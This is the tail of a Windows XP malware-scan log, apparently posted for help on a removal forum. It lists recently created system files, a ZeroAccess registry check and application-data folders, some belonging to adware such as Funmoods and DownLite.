[2013/05/27 19:40:00 | 000,017,062 | ---- | C] () -- C:\WINDOWS\Cafezinho.bmp
[2013/05/27 19:40:00 | 000,016,730 | ---- | C] () -- C:\WINDOWS\Seda.bmp
[2013/05/27 19:40:00 | 000,001,272 | ---- | C] () -- C:\WINDOWS\Renda azul 16.bmp
[2013/05/27 19:39:57 | 000,003,286 | ---- | C] () -- C:\WINDOWS\System32\tslabels.h
[2013/05/27 19:39:57 | 000,001,221 | ---- | C] () -- C:\WINDOWS\System32\usrlogon.cmd
[2013/05/27 19:39:56 | 000,000,768 | ---- | C] () -- C:\WINDOWS\System32\msdtcprf.h
[2013/05/27 19:39:52 | 000,063,488 | ---- | C] () -- C:\WINDOWS\System32\wmimgmt.msc
[2013/05/27 16:38:09 | 000,004,444 | ---- | C] () -- C:\WINDOWS\System32\pid.PNF
[2013/05/27 16:30:22 | 000,004,205 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI
[2013/05/27 16:30:21 | 001,685,606 | ---- | C] () -- C:\WINDOWS\System32\dllcache\sam.spd
[2013/05/27 16:30:21 | 000,000,888 | ---- | C] () -- C:\WINDOWS\System32\dllcache\sam.sdf
[2013/05/27 16:30:20 | 000,643,717 | ---- | C] () -- C:\WINDOWS\System32\dllcache\ltts1033.lxa
[2013/05/27 16:30:20 | 000,605,050 | ---- | C] () -- C:\WINDOWS\System32\dllcache\r1033tts.lxa
[2013/05/27 16:30:04 | 000,000,515 | ---- | C] () -- C:\WINDOWS\System32\AUTOEXEC.NT
[2013/05/27 16:29:57 | 001,233,746 | ---- | C] () -- C:\WINDOWS\System32\dllcache\SP3.CAT
[2013/05/27 16:29:57 | 000,809,104 | ---- | C] () -- C:\WINDOWS\System32\dllcache\NT5IIS.CAT
[2013/05/27 16:29:57 | 000,399,670 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MAPIMIG.CAT
[2013/05/27 16:29:57 | 000,144,484 | ---- | C] () -- C:\WINDOWS\System32\dllcache\netfx.cat
[2013/05/27 16:29:57 | 000,105,628 | ---- | C] () -- C:\WINDOWS\System32\dllcache\tabletpc.cat
[2013/05/27 16:29:57 | 000,037,509 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MW770.CAT
[2013/05/27 16:29:57 | 000,034,747 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mediactr.cat
[2013/05/27 16:29:57 | 000,033,765 | ---- | C] () -- C:\WINDOWS\System32\dllcache\FP4.CAT
[2013/05/27 16:29:57 | 000,016,825 | ---- | C] () -- C:\WINDOWS\System32\dllcache\IMS.CAT
[2013/05/27 16:29:57 | 000,013,497 | ---- | C] () -- C:\WINDOWS\System32\dllcache\HPCRDP.CAT
[2013/05/27 16:29:57 | 000,012,363 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MSMSGS.CAT
[2013/05/27 16:29:57 | 000,010,027 | ---- | C] () -- C:\WINDOWS\System32\dllcache\MSTSWEB.CAT
[2013/05/27 16:29:57 | 000,008,599 | ---- | C] () -- C:\WINDOWS\System32\dllcache\IASNT4.CAT
[2013/05/27 16:29:57 | 000,007,407 | ---- | C] () -- C:\WINDOWS\System32\dllcache\OEMBIOS.CAT
[2013/05/27 16:29:57 | 000,007,334 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmerrenu.cat
[2013/05/27 16:29:56 | 002,038,809 | ---- | C] () -- C:\WINDOWS\System32\dllcache\NT5.CAT
[2013/05/27 16:29:56 | 000,634,592 | ---- | C] () -- C:\WINDOWS\System32\dllcache\NT5INF.CAT
[2013/05/27 16:29:26 | 000,394,368 | ---- | C] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2013/05/27 16:28:32 | 000,000,211 | -HS- | C] () -- C:\boot.ini
[2013/05/27 16:28:30 | 000,000,261 | ---- | C] () -- C:\WINDOWS\System32\$winnt$.inf
[2013/02/13 12:25:14 | 000,001,536 | ---- | C] () -- C:\WINDOWS\System32\IusEventLog.dll
========== ZeroAccess Check ==========
[2013/05/28 21:22:30 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shdocvw.dll -- [2008/04/13 18:20:42 | 001,499,136 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = C:\WINDOWS\system32\wbem\fastprox.dll -- [2009/02/09 07:53:26 | 000,473,600 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = C:\WINDOWS\system32\wbem\wbemess.dll -- [2008/04/13 18:20:42 | 000,273,920 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
========== LOP Check ==========
[2013/06/07 17:03:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Dados de aplicativos\Autodesk
[2013/05/27 21:32:11 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Dados de aplicativos\AVAST Software
[2013/06/13 13:52:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Dados de aplicativos\Tarma Installer
[2013/06/02 18:42:50 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Dados de aplicativos\TEMP
[2013/06/07 18:16:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Autodesk
[2013/06/13 12:59:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Matheus\Dados de aplicativos\DownLite
[2013/06/13 13:43:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Matheus\Dados de aplicativos\Funmoods
[2013/06/13 13:10:07 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Matheus\Dados de aplicativos\GetRightToGo
[2013/06/03 10:57:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Matheus\Dados de aplicativos\LolClient
========== Purity Check ==========
< End of report >
Sign In
Create Account
